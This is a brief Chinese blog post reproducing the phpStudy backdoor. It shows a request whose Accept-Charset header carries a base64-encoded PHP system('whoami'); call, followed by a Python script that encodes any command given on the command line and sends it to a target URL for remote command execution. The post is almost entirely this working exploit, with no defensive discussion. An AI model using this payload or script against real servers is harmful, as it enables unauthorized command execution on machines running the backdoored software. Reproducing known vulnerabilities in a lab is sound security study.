去B站咯

phpstudy后门漏洞复现

 

Accept-Encoding: gzip,deflate
Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs=

 

 

 地址

 

脚本如下:

 

import base64,requests,queue,sys
payload = "system('"+sys.argv[2]+"');"
payload = base64.b64encode(payload.encode('utf-8'))
print(payload)
print("---------------------------------")
headers = {'accept-charset': payload,'Accept-Encoding': 'gzip,deflate'}
print(requests.get(sys.argv[1], headers=headers, verify=False,timeout=30,allow_redirects=False).text)
print("---------------------------------")

 

网安小菜鸡
posted @ 2020-12-11 16:25  不想长大a  阅读(126)  评论(0编辑  收藏  举报